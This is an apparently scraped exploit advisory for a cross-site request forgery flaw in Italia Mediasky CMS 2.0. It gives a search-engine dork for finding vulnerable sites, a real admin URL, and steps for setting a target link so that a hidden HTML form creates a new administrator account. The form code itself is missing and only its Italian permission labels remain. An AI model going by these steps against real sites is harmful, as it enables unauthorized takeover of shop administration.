Italia Mediasky CMS 2.0 Cross Site Request Forgery – Torchsec
| # Title : İtalia Mediasky CMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : http://www.bereewineshop.com/admin/ |
| # Dork : Mediasky - Lato Amministrativo |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 18+19 .
[+] Set the target site link Save changes and apply .
[+] infected file : /admin/reginsuseradmin.php.
[+] infected file : /admin/visuseradmin.php
HOME |
|
|
GESTIONE CONTENUTI |
|
|
|
Metatag Generici
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Pagine Web
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti - Specifiche
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti - Sezioni
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti - Produttori
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti - Recensioni
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti - Denominazioni
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Prodotti - Provenienza
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Slideshow Immagini
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
GESTIONE ORDINI |
|
|
|
Ordini da evadere
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Ordini evasi
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Tutti gli Ordini
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
ANAGRAFICA CLIENTI |
|
|
|
Clienti Privati
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Clienti Aziendali
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Tutti i Clienti
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
STATISTICHE |
|
|
|
Statistiche
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
GESTIONE BACKUP |
|
|
|
Backup Istantaneo
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Backup automatico
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
GESTIONE USER ADMIN |
|
|
|
User Admin
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
GESTIONE TROVAPREZZI |
|
|
|
Genera File Trovaprezzi
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Articoli Trovaprezzi
VISUAL:
INSER:
MODIF:
ARCHIV:
CANCEL:
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================
Gloss